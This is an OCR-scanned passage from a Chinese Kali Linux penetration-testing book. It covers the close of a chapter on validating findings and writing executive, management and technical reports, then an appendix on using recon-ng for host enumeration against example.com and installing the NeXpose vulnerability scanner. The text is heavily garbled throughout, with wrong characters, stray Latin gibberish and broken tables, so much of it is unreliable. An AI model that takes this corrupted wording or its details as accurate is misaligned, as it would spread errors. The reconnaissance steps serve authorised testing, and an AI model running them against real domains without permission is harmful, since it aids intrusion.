那些 文字 拼凑 一 下 束 直 接 向 客户 交付 。 这 种 做 法 不 仅 不 负责 任 ， 而 且 
缺乏 对 评估 过 程 的 必要 控制 ， 最 终 可 能 导致 六 重 的 后 果 ， 甚 至 影响 测 
试 人 员 的 职业 生涯 。 如 果 软 件 的 扫 搬 结果 存在 假 了 明 性 问题 ， 会 让 用 户 
错误 地 判断 安全 水 平 ， 甚 至 令 他 们 身 陷 危 险 。 因 此 ， 必 须 尽 量 排 除 错 
运 ， 消 除 测试 结 末 之 中 的 各 种 矛盾 ， 力 和 争 保 证 测试 数据 的 完整 性 不 受 
人 为 因素 的 影响。 以 下 的 这 些 工作 方法 ， 有 助 于 测试 人 员 进 行文 档 管 
理 并 验证 测试 结 琳 的 有 效 性 ， 从 而 帮助 他 们 把 数据 转变 为 真正 的 最 终 
报告 。 

e 详细 记录 信息 收集 、 目 标识 别 、 服 务 枚 举 、 漏 洞 映射 、 社 会 工程 
学 、 漏 洞 利用 、 提 升 权 权 和 访问 维护 各 阶段 的 具体 工作 步 桑 。 

e 最 好 给 每 个 将 会 用 到 的 Kali 工具 都 草拟 一 份 笔 记 模板 。 这 种 模板 
应 当 明 确 声明 工具 用 途 、 指 令 选 项 、 与 评估 任务 的 关系 ， 并 至 出 留 日 
以 记录 相应 的 测试 结 琳 。 在 使 用 特定 工具 得 出 某 项 结论 之 前 ， 要 至 少 
重复 这 些 过 程 两 次 ， 以 避免 测试 结果 受 不 可 过 见 因素 的 影响 。 例 如 ， 
在 使 用 Nmap 程 序 进 行 端口 扫描 时 ， 测 试 人 员 应 当 确定 笔记 模板 中 的 内 
Ahn TRACER NR, Bete: 使 用 目的 、 目 标 主 机 、 指 令 选 
项 、 相 关 简 介 (例如 服务 监测 、 操 作 系 统 类 型 、MAC 地 址 、 开 放 端 
口 、 设 备 类 型 等 内 容 ) ， 并 记录 下 相关 程序 的 输出 结果 © 

e 不 要 仪 赁 单一 工具 的 结果 就 草率 地 作出 鉴定 结论 。 过 于 依赖 单一 
工具 (例如 信息 收集 工具 ) 的 做 法 绝对 不 可 取 ， 因 为 那样 可 能 会 给 渗 
透 测 试 工作 带 来 偏差 甚至 错误 。 所 以 ， 本 书 强烈 建议 您 使 用 不 同 的 工 
具 进 行 相同 项 目的 测试 。 这 将 确保 测试 结果 的 有 效 性 ， 提 高 效率 ， 减 
少 假 阴 性 和 假 阳 性 的 偏差 问题 。 换 而 言 之 ， 每 个 工具 都 是 在 特定 环境 


下 使 用 的 具有 各 上 自 专 长 的 程序 。 某 些 实际 情况 下 ， 测 试 人 员 可 能 要 进 
行人 工 测 试 。 总 而 言 之 ， 要 充分 利用 个 人 知识 和 项 目 经 验 验 证 程序 结 
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12.2 报告 的 种 类 


在 验证 过 测试 结果 的 全 部 细 市 之 后 ， 测 试 人 员 要 把 这 些 信息 条 理 
分 明 地 组 合成 结构 清晰 的 书面 报告 ， 最 后 还 要 把 报告 交付 给 利益 相关 
者 。 测 试 报告 可 分 为 三 种 类 型 。 每 种 类 型 的 报告 都 有 各 上 自 的 模式 ， 分 
别 侧重 于 被 测 单 位 的 不 同 角色 人 员 。 这 三 种 报告 分 别 是 : 

e 行政 报告 ; 

e 管理 报告 ; 

e 技术 报告 。 

渗透 测试 人 员 要 根据 阅读 人 员 的 理解 能 力 传递 相应 的 信息 。 本 文 
将 详细 介绍 每 一 种 报告 的 行文 结构 和 基本 要 素 。 人 然而， 具体 内容 就 需 
要 测试 人 员 根 据 项 目 目标 自行 其 酌 了 。 需 要 注意 的 是 ， 在 向 有 关 人 员 
交付 这 些 报告 之 前 ， 应 当 确 保 这 些 报告 向 他 们 披露 的 信息 与 保密 协 
议 、 法 律 规 定 和 渗透 测试 协议 的 要 求 一 致 。 

12.2.1 行政 报告 


在 各 种 评 佑 报告 中 ， 行 政 报告 属于 较为 简 清 的 报告 。 这 种 报告 应 
当 以 企业 高 层 的 角度 ， 从 业务 战略 的 方面 介绍 渗透 测试 的 作用 。 这 种 
报告 主要 面 对 被 测 单位 C 开 头 的 高 管 《CEO、CTO、CIO 等 ) ， 所 以 必 
须 具 备 下 列 基本 要 素 。 

e 项 目 目标 : 有 渗透 测试 人 员 和 被 测 单位 共同 协商 制定 的 评定 准 
则 。 

e 漏洞 与 其 风险 等 级 这 部 分 内 容 要 描述 漏洞 的 风险 等 级 (RE 
级 、 高 危 级 、 中 等 风险 、 低 等 风险 级 和 信息 泄露 级 ) 。 风 险 的 等 级 界 


定 应 能 划分 并 突出 技术 安全 问题 的 严重 程度 。 

e 执行 摘要 : 简明 扼要 地 描述 此 次 渗透 测试 任务 采用 的 方法 论 、 作 
用 和 目标 ， 并 着 重 介绍 漏洞 的 数量 以 及 可 被 利用 的 漏洞 数量 。 

e 漏洞 统计 : 分 类 介绍 目标 网 络 系统 里 存在 的 漏洞 。 通 常 ， 测 试 人 
员 还 会 以 饼 形 图 或 其 他 简明 易 懂 的 方式 进行 演示 。 

e 风险 矩阵: 对 以 识别 出 的 漏洞 进行 量化 分 析 和 分 类 总 结 ， 推 断 可 
能 会 受 风 险 影 响 的 相关 资源 ， 以 便于 记忆 的 方式 列举 出 此 次 任务 的 发 
现 、 参 考 文献 和 改进 建议 。 

在 草拟 行政 报告 时 ， 最 好 能 够 兼顾 报告 内 容 的 创造 力 和 文字 的 表 
达能 力 。 行 政 报告 并 不 是 以 技术 角度 反映 评估 结果 的 技术 细节 ， 而 是 
要 对 技术 评估 结果 进行 总 结 ， 指 出 它们 对 业务 的 实际 影响 。 一 般 来 
说 ,行政 报告 的 篇 幅 应 当 是 2~4 页 。 

12.2.2 管理 报告 

管理 报告 通常 讨论 安全 问题 相关 的 法 律 法 规 和 合 规 性 问题 。 这 种 
报告 通常 是 对 行政 报告 的 必要 扩充 ， 不 仅 应 能 满足 人 力 资源 和 其 他 管 
理 层 人 士 的 工作 需要 ， 而 且 要 从 法 定 程 序 的 角度 分 析 问 题 。 此 类 报告 
可 能 需要 涉及 以 下 方面 。 

e 法 规 问 题 : 报告 首先 应 当 列 举 出 已 知 的 各 种 安全 标准 和 法 律 法 
规 ， 并 指出 它们 与 当前 安全 问题 涉及 的 有 关 法 律 条 款 。 应 当 重 点 突出 
已 经 触及 的 法 律 问 题 ， 以 及 企业 可 能 在 不 经 意 间 就 会 面临 的 严重 的 法 
律 风 险 。 

e 测试 方法 : 帮助 管理 层 人 士 理解 渗透 测试 生命 周期 的 简要 介绍 。 

e 假设 与 局 限 性 : 阐述 那些 可 能 影响 渗透 测试 人 员 完 成 特定 目标 的 
已 知 因素 。 

e 变更 管理 : 某 些 人 可 能 认为 只 有 当 被 测 单位 进行 系统 改进 的 时 
候 ， 测 试 人 员 才 会 涉及 变更 管理 的 工作 。 但 是 ， 在 受 控 的 IT 环境 中 ， 


策略 管理 和 业务 流程 都 涉及 变更 管理 。 测 试 人 员 在 安全 评估 报告 中 提 
及 的 建议 和 推荐 ， 应 当 与 整个 工作 中 地 变化 情况 保持 一 致 ， 以 最 大 程 
度 的 减少 意外 事件 给 评 佑 服务 带 来 的 负面 影响 。 

e 配置 管 理 : 侧重 于 保持 信息 系统 功能 和 性 能 的 一 致 性 。 以 系统 安 
全 的 角度 来 看 ， 每 当 某 个 变更 可 能 影响 目标 环境 (硬件 、 软 件 、 物 理 
属性 和 其 他 问题 ) 的 时 候 ， 有 关 人 员 束 应 当 随 后 进行 相应 的 配置 管 
理 。 这 种 管理 是 对 系统 配置 的 一 种 监控 手段 ， 以 维护 系统 的 配置 状 
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一 个 负责 的 专业 渗透 测 斌 人员， 在 渗透 测试 步 入 任何 环 让 之 前 都 
会 丫 管 理 团队 阐明 情况 。 这 种 沟通 工作 不 仅 涉 及 一 对 一 的 面 炭 ， 而 且 
要 明确 界定 特定 测试 的 评 佰 标准 。 即 ， 测 斌 人 员 要 和 被 测 蛙 位 探讨 评 
估 时 涉及 合 规 化 要 求 、 评 估 末 用 的 标准 框架， 确定 特定 测试 的 实际 限 
制 ， 判 断 改进 建议 是 否 对 目标 系统 切实 可 行 ， 了 解 配置 变更 对 当前 系 
统 状 态 的 影响 等 。 所 有 这 些 因素 部 与 目标 环境 的 安全 状态 有 看 和 干 丝 万 
缕 的 联系 ， 决 定 着 技术 安全 评估 人 员 应 当 给 予 什么 建议 和 意见 。 

12.2.3 告 


被 评估 单位 主要 参照 技术 报告 解决 渗透 测试 时 发 现 的 安全 问题 。 
这 类 报告 主要 面向 技术 人 员 ， 帮 助 他 们 理解 目标 系统 的 核心 安全 问 
题 。 技 术 报 告 详 细 介绍 各 种 漏洞 、 利 用 调 洞 的 具体 方法 、 安 全 问题 给 
业务 带 来 的 负面 影响 ， 以 及 针对 这 些 威胁 的 补救 建议 。 它 得 是 全 面 保 
护 网 络 系统 的 安全 防护 指南 。 前 文 介绍 了 行政 报告 和 管理 报告 的 基本 
要 素 。 技 术 报 告 要 对 这 两 种 报告 进行 补充 说 明 ， 满 足 被 评 信 单位 技术 
团队 的 各 种 需求 。 有 些 情况 下 ， 技 术 报告 也 要 包含 前 两 种 报告 中 的 项 
目 目 标 、 漏 洞 及 其 风险 等 级 、 风 险 甜 阵 、 漏 洞 统计 、 测 试 方法 和 假设 
与 局 限 性 内 容 。 不 过 ， 技 术 报 告 的 至 少 要 涵盖 以 下 内 容 。 


eel: 技术 报告 应 当 详 细 描述 在 渗透 过 程 中 发 现 的 安全 问题 
和 针对 这 些 漏洞 的 攻击 方法 。 它 应 该 使 用 列表 详尽 描述 受 影 响 的 资源 
范围 、 攻 击 后 果 、 测 试 时 的 请 求 和 响应 数据 、 模 拟 攻击 所 使 用 的 请 求 
和 响应 数据 、 辣 改善 团队 提供 外 部 的 参考 文献 、 列 举 出 可 帮助 被 评估 
单位 解决 相关 漏洞 的 针对 性 的 专业 建议 。 

e 漏洞 映射 : 技术 报告 还 应 当 详细 列举 出 每 个 漏洞 的 具体 位 置 ， 通 
过 标识 信息 的 映射 〈 即 参照 信息 ) 帮助 技术 人 员 找 到 漏洞 所 在 。 例 
如 ， 了 地 址 和 相应 主机 的 对 应 关系 吏 是 一 种 标识 信息 的 映射 。 

e 利用 程序 映射 : 技术 报告 应 当 列 举 出 测试 人 员 核 对 并 验证 过 的 漏 
洞 利用 程序 (exploit) ， 并 且 要 指明 有 关 的 漏洞 利用 程序 是 在 网 络 里 可 
以 找到 的 公开 程序 ， 还 是 不 公开 的 目测 程序 。 如 采 能 够 指出 漏洞 利用 
程序 的 下 载 地 址 并 说 明 它 的 公开 日 期 ， 那 么 这 份 报告 就 更 有 说 服 力 。 

e 最 佳 实践 : 最 佳 实践 可 指导 有 关 人 员 改 进 在 设计 、 实 施 和 运 划 方 
面 的 安全 机 制 。 例 如 ， 大 型 企业 的 IT 环境 通常 部 署 边界 级 别 的 保护 设 
施 ， 以 降低 外 部 入 侵 的 几率 。 最 佳 实践 的 各 种 案例 都 非常 灵活 ， 不 需 
要 干预 生产 系统 也 不 需要 改动 原 有 程序 。 

一 般 来 说 ， 技 术 报 告 是 向 被 测 单位 有 关 人 员 如 实 反 映 实 际 情况 的 
拉 术 文件 。 技 术 报 告 在 风险 管理 中 的 作用 重大 ， 多 数 情况 下 都会 被 用 
于 指导 安全 系统 的 改进 工作 。 


12.3 渗透 测试 报告 ( 样 文 ) 
因为 渗透 测试 各 有 不 同 ， 所 以 渗透 测试 报告 的 行文 结构 也 灵活 多 
变 。 本 文 提 供 了 一 份 以 网 络 为 测试 对 象 的 渗透 测试 报告 ， 读 者 可 以 将 


其 扩展 为 其 他 类 型 (如 Web 应 用 、 防 火 墙 、 无 线 网 络 等 ， 的 渗透 测试 报 
告 。 渗 透 测 试 报告 不 仅 有 正文 ， 肯定 还 有 封面 。 应 当 在 报告 封面 里 注 


明 公 司 名 称 、 报 告 类 型 、 扫 摘 日 期 、 作 者 姓名 、 文 件 修 订 写 、 人 简短 的 
版 权 声 明和 保密 声明 。 

以 网 络 为 测试 目标 的 渗透 测试 报告 ， 其 正文 部 分 应 当 由 以 下 内 容 
组 成 。 

e 法 律 声 明 (Legal notice) 

e 渗透 测试 协议 (Penetration testing agreement) 


e 简介 (Introduction) 

e 项 目 目标 (Project objective) 

e 假定 和 限制 (Assumptions and imitations) 
e 漏洞 的 影响 (Vulnerability risk scale) 

e 执行 摘要 (Executive summary) 

e 风险 矩阵 
e 测试 方法 


(Risk matrix) 
( 
e 安全 威胁 (Security threats) 
( 
( 


Testing methodology) 


e 改进 建议 

e 漏洞 映射 (Vulnerabilities map) 

e 利用 方法 (Exploits map) 

e 合 规 性 评估 (Compliance assessment) 

e 变更 管理 (Change management) 

e 最 佳 实践 (Best Practices) 

e 附录 (Annexes) 

换 而 言 之 ， 报 告 所 写 人 员 要 使 用 明确 的 行文 结构 ， 把 各 种 类 型 的 
报告 中 的 所 有 信息 整理 为 一 份 单独 的 完整 报告 。 报 告 中 的 这 些 章 又 可 
再 度 细 化 ， 分 为 各 种 让， 以 更 为 详尽 地 介绍 各 种 细节 。 人 例如， 附录 章 
廊 可 在 不 同 小 节 里 分 别 列举 技术 细 证 、 分 析 测 试 过 程 、 操 作 日 志 、 各 
种 安全 工具 的 原始 数据 、 人 研究 的 详情 、 网 络 资 源 的 引用 以 及 术语 表 。 


Recommendations) 


用 户 会 根据 需要 选择 他 们 要 看 的 报告 类 型 ， 而 测试 人 员 要 根据 这 种 需 
求 判断 目 己 的 定位 和 作用 ， 然 后 再 开始 进行 渗透 测试 。 


12.4 示 的 


在 现场 演示 之 前 ， 演 示人 员 应 当 实 现 了 解 听众 的 技术 水 平和 关注 
要 点 。 一 次 成 功 的 现场 演示 ， 离 不 开 针 对 听众 的 需求 精心 准备 。 阁 演 
讲 内 容 与 听众 需求 胶 节 ， 演 示 活 动 将 会 招致 听众 的 反感 。 现 场 演示 主 
要 为 了 让 听众 理解 测试 人 员 在 测试 环节 中 发 现 的 六 在 风险 因素 。 例 
如 ， 行 政 级别 的 经 理 可 能 没有 心思 关注 社会 工程 学 攻击 问题 ,但 是 他 
们 可 能 需要 理解 安全 的 现状 ， 想 指导 采用 什么 措施 可 以 改善 系统 的 安 
全 性 。 

里 然 在 准备 演示 资料 和 演示 方法 方面 没有 统一 的 正规 流程 ， 但 是 
演讲 人 员 还 是 应 当 尽 量 让 听众 中 的 技术 人 员 和 非 技 术 人 员 都 能 有 所 收 
获 。 售 测 听众 的 技能 水 平 与 了 解说 测 信息 系统 一 样 ， 部 是 测试 人 员 的 
工作 。 在 现场 演示 中 ， 要 让 听众 像 了 解 他 们 的 关键 资产 那样 了 解 演 讲 
人 员 的 技术 实力 。 

只 有 客观 地 指出 当前 安全 问题 中 存在 的 缺陷 ， 才 能 保证 现场 演示 
不 失 专 业 水 准 。 一 次 成 功 的 现场 演示 应 当 以 事实 和 现象 为 依据 ， 由 技 
术 论 证 得 出 相应 结论 ， 并 要 给 甲 方 负责 改进 的 团队 提供 相应 的 意见 。 
演示 是 一 种 面对面 的 交流 活动 ， 演 讲 人 员 应 当 事 先 准备 好 支持 论点 的 
事实 和 数据 。 


12.5 测试 的 后 期 流程 


提供 补救 措施 、 改 正 步 又 和 整改 建议 都 古 渗透 测试 后 期 阶段 的 工 
作 。 在 这 些 工作 里 ， 渗 透 测 试 人 员 要 担当 被 测 单位 的 改进 顾问 。 因 为 


要 和 大 量 的 技术 人 员 打 有 交道， 所 以 此 时 沟通 能 力 和 网 络 技术 能 力 就 显 
得 尤为 重要 。 

此 外 ， 除 非 专 门 进行 培训 ， 人 否则 目标 人 群 不 可 能 掌握 被 测 单位 IT 
系统 的 全 部 知识 。 这 种 条 件 下 渗透 测试 人 员 的 工作 很 难 做 ， 他 们 就 需 
要 与 有 关 技 术 的 专家 配合 ， 才 能 知道 如 何 修补 各 个 缺陷 。 本 文 提 出 几 
个 通用 准则 ， 以 帮助 读者 向 客户 提供 关键 的 改进 建议 。 

e 测试 报告 要 从 网 络 设计 入 手 ， 并 且 指 出 可 能 利用 漏洞 的 各 种 必 备 
RIPS 

e 侧重 分 析 安 全 边界 或 数据 中 心 的 保护 方案 ， 力 图 在 安全 威胁 后 台 
服务 器 或 工作 站 之 前 降低 它们 的 数量 。 

e 客户 端 攻击 和 社会 工程 学 攻击 几乎 无 法 避免 。 但 是 对 员工 进行 针 
对 性 的 最 新 对 策 和 安全 意识 培训 ， 至 少 可 以 降低 这 些 攻击 的 危害 。 

e 渗透 测试 人 员 在 提出 每 项 建议 之 前 ， 应 当 进 行 额外 的 调查 ， 以 确 
保 他 们 的 建议 不 会 影响 目标 系统 的 功能 。 

e 在 有 必要 部 署 第 三 方 解 决 方案 (IDS/PS、 防 火 墙 、 内 容 保护 系 
统 、 杀 毒 软件 、IAM 技 术 等 ) 的 时 候 ， 应 当 验 证 这 些 方案 的 有 效 性 和 
可 靠 性 ， 还 要 对 软件 运行 机 制 进行 安全 和 效率 方面 的 优化 。 

e 要 区 别 对 待 不 安全 的 或 面向 公共 提供 网 络 服务 的 ) 网 域 和 安全 
的 网 域 ， 实 施 分 而 治之 的 保护 策略 。 

e 提高 研发 团队 的 安全 水 准 ， 通 过 安全 的 应 用 程序 提高 目标 IT 系 
统 的 安全 性 。 应 用 程序 的 安全 评 佑 、 源 代码 审计 都 可 以 给 整个 企业 带 
来 很 高 的 回报 。 

e 采用 物理 安全 措施 。 可 通过 安全 环境 设计 、 机 械 与 电子 门禁 、 入 
受 警 报 系统 、 闭 路 电视 监控 系统 和 个 人 身份 识别 系统 ， 进 行 多 层次 的 
入 场 控 制 。 

e 定期 更 新 所 有 重要 的 安全 系统 ， 力 求 保证 其 保密 性 、 完 整 性 和 可 
FATE ° 


。 检 测 并 验证 所 有 文件 中 推荐 的 安全 方案 ， 消 除 入 侵 或 漏洞 利用 的 
可 能 性 。 


12.6 总 结 


本 章 前 述 了 撰写 渗透 测试 报告 所 必需 的 基本 步骤 ， 讨 论 了 辣 客 户 
进行 现场 演示 的 核心 环节 。 本 章 开头 便 介绍 了 从 某 个 工具 中 提取 分 析 
结果 的 具体 方法 ， 并 强调 了 最 终 的 汇报 不 能 单纯 依赖 单一 工具 的 检测 
结 采 。 在 最 终 定稿 之 前 ， 测 试 人 员 必 须 使 用 目 映 经 验 和 有 关 知 识 验证 
测试 结果 。 也 就 是 说 ， 测 试 人 员 应 当 能 人 工 验 证 测 斌 结果。 本章 还 介 
绍 了 不 同类 型 的 报告 格式 ， 集 中 讨论 了 从 行政 、 管 理 和 技术 的 方面 把 
写 灾 全 审计 报告 的 方法 。 此 外 ， 本 文 还 提供 了 一 份 以 网 络 为 对 象 的 渗 
透 测试 报告 模板 ， 读 考 可 在 把 写 报告 的 时 候 参考 我 们 的 模板 。 接 下 
来 ， 本 文 阐述 了 现场 演示 的 价值 和 验证 技术 现象 的 方法 ， 并 介绍 了 向 
不 同 职业 育 景 的 听众 进行 演示 的 有 天 要 点 。 

最 后 ， 本 章 还 提供 了 在 渗透 测试 后 期 通用 的 工作 流程 。 读 者 在 向 
用 户 提供 有 关 补 救 措 施 或 者 改进 建议 的 时 候 ， 可 能 需要 参考 这 部 分 内 
容 。 这 一 厄 详 细 阐 述 了 测试 人 员 以 对 方 技术 团队 顾问 的 映 份 ， 或 者 以 
改进 负责 人 的 吴 份 向 被 测试 单位 提供 整治 意见 的 方法 。 
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附录 A 辅助 工具 
本 章 将 会 通过 以 下 几 个 角度 ， 简 要 介绍 几 款 渗透 测试 的 辅助 工 


e 工具 的 功能 ; 
e 如 果 这 款 工 具 没 有 被 Kali Linux 收录 ， 本 文 也 会 介绍 其 安装 过 


e 应 用 案例 。 
稍 后 介绍 的 部 分 工具 确实 没有 被 Kali Linux 收录 。 要 使 用 这 些 软 
Wie 2e (EDC Kali Linux 的 软件 仓库 配置 文件 /etc/apt/sources.lst， 然 


后 使 用 apt-get 指 令 进行 下 载 ， 您 还 可 以 从 各 个 工具 的 官方 网 站 下 载 这 些 
程序 。 


我 们 把 这 些 工 ~ PALL BIL: 
o (F AMAL 


e RB 
e Web 应 用 程序 工具 。 
e 网络 工具 。 


现在 ， 我 们 束 亲 密 接 触 这 些 工 具 吧 | 


A.1 侦察 工具 

recon-ng 是 一 款 帮 助 我 们 进行 信息 侦察 的 程序 。 确 切 的 说 ， 它 是 
By Hs BS BTE UNS Metasploit hy f Zg FE 
面 ， 您 可 能 就 会 觉得 recon-ng 的 界面 很 顺手 recon-ng 的 界面 模仿 的 
就 是 Metasploit 的 界面 。 

Kali Linux 已 经 安装 了 recon-ng 1.41 版 本 。 喜 欢 党 试 新 版 本 的 读 
者 ， 可 以 从 其 官方 网 站 进行 更 新 
https://bitbucket.org/LaN MaSteR53/recon-ng/ overview ? 

默认 安装 的 recon-ng 带 有 信息 侦察 和 目标 识别 的 功能 模块 。 对 
1.41 版 recon-ng 的 功能 模块 进行 分 类 统计 ， 可 得 到 以 下 数据 。 

e Recon modules 〈 侦 察 模 块 ) : 65 个 。 

e Discovery modules 〈 识 别 模块 ) : 7 个 。 

e Reporting modules (报告 模块 : 4 个 。 

e Experimental modules (实验 性 模块 ):; 1 个 。 

如 需 局 动 recon-ng 程 序 ， 可 使 用 下 述 指令 。 

# recon-ng 

fT bxhdB4 Zia, MERE A Bl recon-ngte2 By dcm f$ 〈 见 图 
Al) 。 大 体 上 看 ， 它 的 提示 信息 和 Metasploit 界 面 的 提示 信息 十 分 相 
似 。 


:~# recon-ng 


[65] Recon modules 

[7] Discovery modules 
[4] Reporting modules 
[1] Experimental modules 


recon-ng > J 


图 A.1 


如 需 查看 recon-ng 文 持 的 各 种 指令 ， 可 以 在 其 提示 符 状 态 下 使 用 
help 指 令 。 这 个 指令 的 运行 结果 如 图 A.2 所 示 。 

在 这 些 指令 中 ， 最 常用 的 几 个 指令 如 下 所 示 。 

e use 或 load: 加 载 指 定 模块 。 

e reload: 重新 加 载 所 有 模块 。 

o info: 显示 指定 模块 的 具体 信息 。 

orun: 运行 指定 的 模块 。 

e show: 展现 recon-ng 框架 的 各 种 数据 对 象 。 

e back: 退出 当前 提示 符 的 级 别 。 

show modules 指 令 可 以 列 出 可 供 使 用 的 全 部 模块 。 这 个 指令 的 运行 
结果 如 图 A.3 所 示 。 


recon-ng > neip 


Commands (type [help|?] «topic»): 


Exits current prompt level 

Displays the banner 

Exits current prompt level 

Displays this menu 

Displays module information 

Manages framework API keys 

Loads selected module 

Queries the database 

Records commands to a resource file 
Reloads all modules 

Executes commands from a resource file 
Not available 

Searches available modules 

Sets global options 

Executed shell commands 

Shows various framework items 

Loads selected module 


图 A.2 


recon-ng » show modules 


Discovery 


discovery/exploitable/http/dnn fcklinkgallery 
discovery/exploitable/http/generic restaurantmenu 
discovery/exploitable/http/webwiz rte 
discovery/info disclosure/dns/cache snoop 
discovery/info disclosure/http/backup finder 
discovery/info disclosure/http/google ids 
discovery/info disclosure/http/interesting files 


Experimental 


recon/contacts/enum/http/web/dev diver 
recon/contacts/enum/http/web/namechk 
recon/contacts/enum/http/web/pwnedlist 
recon/contacts/enum/http/web/should change password 
recon/contacts/gather/http/api/jigsaw/point usage 
recon/contacts/gather/http/api/jigsaw/purchase contact 
recon/contacts/gather/http/api/jigsaw/search contacts 
recon/contacts/gather/http/api/linkedin auth 
recon/contacts/gather/http/api/twitter 
recon/contacts/gather/http/api/whois pocs 


图 A.3 
下 述 指令 可 通过 Bing 的 搜索 引擎， 收集 指定 域名 的 各 主机 信息 。 


recon-ng > load recon/hosts/gather/http/web/bing_site 


recon-ng [bing site] > set domain example.com 

DOMAIN => example.com 

recon-ng [bing. site] > run 

[*] URL:  http;//www.bing.com/search?first-0 & q-site963A 


example.com 


[*] www.example.com 

[*] leb.example.com 

[*] sos.example.com 

[*] forms.example.com 

[*] bankrobbers.example.com 
[*] vault.example.com 

[*] tips.example.com 

[*] delivery.example.com 

[*] omaha.example.com 

[*] chicago.example.com 

[*] foia.example.com 

[*] 11 total hosts found. 

[*] 11 NEW hosts found! 
然后 ， 我 们 通过 show hosts 指令 查询 前 一 个 指令 的 搜索 结果 。 


recon-ng [bing site] » show hosts 


AE a el a LAS pnp pcos i eae iti PRO lei esos ONDE 
---------- 十 

| host | ip address | region | country | latitude | 
longitude | 

——nPc— mere etc PE HOP POPE 
---------- + 


| bankrobbers.example.com | | | | 


| chicago.example.com | | | 


| delivery.example.com | | | 


| foia.example.com | | | 


forms.example.com | | | | 


| leb.example.com | | | | 


omaha . example.com | | | 


| sos.example.com | | | | 


tips.example.com | | | | 


| vault.example.com | | | | 


| www.example.com | | | | 


[*] 11 rows returned 


上 述 例 子 只 是 recon-ng 多 种 功能 的 一 个 例子 。 有 天 它 的 各 种 功能 的 
详细 人 介绍， 还 请 查询 作者 的 官方 网 站 
(https://bitbucket.org/LaNMaSteR53/recon-ng/wiki/Home) ° 

A.2 漏洞 扫描 程序 

Kali Linux 默认 安装 了 OpenVAS。 虽 然 它 是 一 款 漏洞 扫描 程序 ， 但 
是 渗透 测试 人 员 不 能 仅 依 赖 一 款 工 具 就 确定 安全 现象 。 我 们 应 当 使 用 


多 款 工具 获取 更 为 全面 和 详实 的 信息 ， 充 分 理解 被 测 信 息 系 统 的 安全 
BI ° 
本 节 将 要 介绍 Rapid7 出 品 的 NeXpose 漏洞 扫描 程序 〈 共 享 版 ) 。 
A.2.1 NeXpose 共 享 版 
Rapid7 推出 的 NeXpose Vulnerability Scanner Community Edition 
(NeXposeCE) 是 一 款 免费 的 漏洞 扫描 程序 。 它 可 以 与 Metasploit 
exploit 框架 整合 。 
NeXpose 共享 版 具有 以 下 特性 : 
e 8637111839 2 32 “MIP; 
e 漏洞 数据 库 可 定期 升级 ; 
e 可 指定 风险 评估 的 优先 级 ; 
e 可 为 改进 安全 性 提供 指导 建议 ; 
e 可 与 Metasploit 整合 ; 
e 通过 网 站 (http://community.rapid7.com) 提供 共享 版 的 有 关 支 


eZTu 

e 可 作为 免费 的 初级 安全 解决 方案 。 

商业 版 的 NeXpose 程 序 具备 更 多 功能 。 例 如 ， 它 对 扫描 的 IP 数 量 没 
有 限制 ， 可 进行 分 布 式 扫 摘 ， 扫 摘 报告 更 为 灵活 ， 可 进行 Web 和 数据 库 
应 用 程序 扫描 ， 并 有 专门 的 技术 文 持 服务 。 

NeXpose 由 两 个 部 分 组 成 。 

e NeXpose 扫 摘 引 警 : 目标 识别 和 检测 漏洞 的 后 台 程 序 。 共 享 版 程 
序 只 有 一 个 引擎 ， 即 本 地 引擎 e 

e NeXpose 安 全 控制 台 : 安全 控制 台 负 责 与 扫描 引 警 互动， 以 启动 
扫 摘 任务 并 接收 扫 摘 结果 。 挥 制 台 还 配 有 可 配置 、 操 作 扫 摘 引 擎 的 Web 
接口 。 


在 初步 了 解 了 NeXpose 共 享 版 的 情况 之 后 ， 我 们 接 下 来 安装 这 个 程 
序 。 

1. 安装 NeXpose 

在 Kali Linux 种 安装 NeXpose 共享 版 的 具体 步骤 如 下 。 

1 访 加 网 让 
http:||www.rapid7.com/products/nexpose/nexposecommunity. jsp 并 下 载 安 
装 程序 。 您 首先 需要 使 用 工作 E-mail 进行 注册 。 此 后 ， 网 站 会 把 
NeXpose CE 许可 证 密 铀 和 下 载 指南 发 送 给 注册 的 E-mail 地 址 。 

2. 根据 E-mail 里 的 信息 下 载 NeXpose 共 享 版 的 安装 程序 。 本 例 下 
载 的 是 适用 于 64 位 Linux 操 作 系 统 的 安装 程序 
Linux64.bin ° 

3. 打开 终端 程序 ， 进 入 下 载 文件 所 在 目录 。 

4. 然后 通过 下 述 指令 启动 NeXpose 的 安装 程序 。 

# ./NeXposeSetup-Linux64.bin 

屏幕 上 会 显示 NeXpose 的 安装 界面 ， 如 图 A.4 所 示 。 


NeXposeSetup- 


Installer - Nexpose E 


' The installer is comparing your system settings to required settings 


X nexpose 
Hardware requirements 

AP Intel 1 Core(s) (9 2,466 MHz processor was detected. 

¿"+ 2,016 MB RAM was detected. 8.192 MB RAM is recommended. 
Software requirements 
License agreement OS Check 
User details Kernel Check 

and destinatior SELinux Check 

details P Nexpose is not running. 

shortcut location Ports and connectivity 
Confirm selections < Access to external networks was detected. 
Installation progress 9€ Port 5432 is in use. 
* Initialization <P Port 3780 is available. 


Installation success 


Welcome 


* System check 


RAPIDY? 


= = = 


图 A.4 

5. 根据 屏幕 上 的 提示 进行 操作 ， 逐 步 完 成 安装 过 程 。 请 妥善 保管 
在 配置 过 程 中 设 定 的 用 户 名 和 和 密码。 如 果 您 忘记 了 用 户 名 或 密码 ， 整 
要 重新 安装 NeXpose 程 序 。 

2. 启动 NeXpose 

安装 完毕 之 后 ， 您 就 可 以 进入 程序 所 在 目录 启动 NeXpose 程序 。 

默认 的 安装 目录 是 /opt/rapid7/nexpose。 相 对 应 地 ， 您 应 当 通 过 下 壕 指 
令 进 入 程序 启动 脚本 所 在 的 目录 。 

# cd /opt/rapid7/nexpose/nsc 

然后 通过 下 述 脚本 程序 启动 NeXpose。 

# ./nsc.sh 


由 于 NeXpose 需要 在 启动 过 程 中 初始 化 漏洞 信息 数据 库 ， 所 以 程 
序 的 启动 过 程 可 能 要 花费 数 分 钟 的 时 间 。 待 程序 启动 完毕 ， 您 就 可 以 
通过 浏览 器 登录 到 NeXpose 的 安全 控制 台 。 

如 果 把 NeXpose 程 序 安装 为 守护 进程 (daemon) ， 那 么 启动 系统 
的 时 候 它 都 会 目 动 局 动 ; 男 外 ， 用 户 的 注销 操作 也 不 会 终止 守护 进 
程 。 把 它 安装 为 守护 进程 的 具体 步 又 如 下 。 

1. 使 用 下 壕 指 令 进 入 文件 nexposeconsole.rc 的 所 在 目录 。 

# cd [installation_directory]/nsc 

2. 打开 这 个 文件 ， 并 确定 NXP_ROOT 变 量 已 经 设置 为 NeXpose 的 
AUR HK ? 

